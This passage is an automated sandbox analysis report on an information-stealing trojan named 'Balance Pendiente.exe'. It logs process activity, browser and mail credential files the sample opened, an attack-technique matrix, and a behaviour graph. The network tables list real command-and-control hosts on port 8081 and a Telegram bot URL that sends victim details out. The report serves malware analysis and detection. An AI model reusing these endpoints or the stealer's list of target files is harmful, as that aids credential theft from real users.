            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00405B89 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B89

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5660, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5660, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5660, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Obfuscated Files or Information
            1
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts311
            Process Injection
            1
            Software Packing
            LSASS Memory14
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)Logon Script (Windows)1
            DLL Side-Loading
            Security Account Manager11
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
            Virtualization/Sandbox Evasion
            LSA Secrets21
            Virtualization/Sandbox Evasion
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
            Process Injection
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1623448 Sample: Balance Pendiente.exe Startdate: 25/02/2025 Architecture: WINDOWS Score: 100 27 reallyfreegeoip.org 2->27 29 api.telegram.org 2->29 31 4 other IPs or domains 2->31 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Multi AV Scanner detection for dropped file 2->47 53 7 other signatures 2->53 8 Balance Pendiente.exe 1 29 2->8         started        signatures3 49 Tries to detect the country of the analysis system (by using the IP) 27->49 51 Uses the Telegram API (likely for C&C communication) 29->51 process4 file5 21 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->21 dropped 11 powershell.exe 30 8->11         started        process6 file7 23 C:\Users\user\...\Balance Pendiente.exe, PE32 11->23 dropped 25 C:\...\Balance Pendiente.exe:Zone.Identifier, ASCII 11->25 dropped 55 Early bird code injection technique detected 11->55 57 Writes to foreign memory regions 11->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 11->59 61 3 other signatures 11->61 15 msiexec.exe 15 8 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 33 api.telegram.org 149.154.167.220, 443, 49905 TELEGRAMRU United Kingdom 15->33 35 checkip.dyndns.com 158.101.44.242, 49812, 49830, 49842 ORACLE-BMC-31898US United States 15->35 37 3 other IPs or domains 15->37 39 Tries to steal Mail credentials (via file / registry access) 15->39 41 Tries to harvest and steal browser information (history, passwords, etc) 15->41 signatures11

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Balance Pendiente.exe44%VirustotalBrowse
            Balance Pendiente.exe38%ReversingLabsWin32.Trojan.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll0%VirustotalBrowse
            C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe38%ReversingLabsWin32.Trojan.Generic
            C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe44%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.18.14
            truefalse
              high
              drive.usercontent.google.com
              142.250.185.193
              truefalse
                high
                reallyfreegeoip.org
                104.21.96.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    158.101.44.242
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2025/02/2025%20/%2014:12:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgmsiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botmsiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17msiexec.exe, 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022ECB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E56000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FFA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000006.00000002.2993742272.0000000021F40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://varders.kozow.com:8081msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.office.com/lBdqmsiexec.exe, 00000006.00000002.2993742272.0000000021F6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.google.commsiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installmsiexec.exe, 00000006.00000002.2996723213.0000000022EA6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E5C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023000000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://apis.google.commsiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2160143305.0000000004761000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reallyfreegeoip.org/xml/msiexec.exe, 00000006.00000002.2993742272.0000000021DCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.office.com/msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://drive.google.com/:msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20amsiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://drive.usercontent.google.com/msiexec.exe, 00000006.00000003.2349911508.0000000006381000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981936990.0000000006342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://checkip.dyndns.orgmsiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://chrome.google.com/webstore?hl=en4msiexec.exe, 00000006.00000002.2993742272.0000000021F40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016msiexec.exe, 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022ECB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E56000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FFA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorBalance Pendiente.exe, Balance Pendiente.exe.1.drfalse
                                                                                                    high
                                                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.ecosia.org/newtab/msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://aborters.duckdns.org:8081msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://ac.ecosia.org/autocomplete?q=msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://nsis.sf.net/NSIS_ErrorBalance Pendiente.exe, Balance Pendiente.exe.1.drfalse
                                                                                                                high
                                                                                                                https://chrome.google.com/webstore?hl=enlBdqmsiexec.exe, 00000006.00000002.2993742272.0000000021F3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.office.com/4msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.micropowershell.exe, 00000001.00000002.2167965758.0000000006F3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://ion=v4.5powershell.exe, 00000001.00000002.2167965758.0000000006F3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://anotherarmy.dns.army:8081msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://aka.ms/pscore6lBdqpowershell.exe, 00000001.00000002.2160143305.0000000004761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000006.00000002.2993742272.0000000021DF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://reallyfreegeoip.orgmsiexec.exe, 00000006.00000002.2993742272.0000000021DCC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesmsiexec.exe, 00000006.00000002.2996723213.0000000022EA6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E5C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023000000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      142.250.185.193
                                                                                                                                      drive.usercontent.google.comUnited States
                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                      149.154.167.220
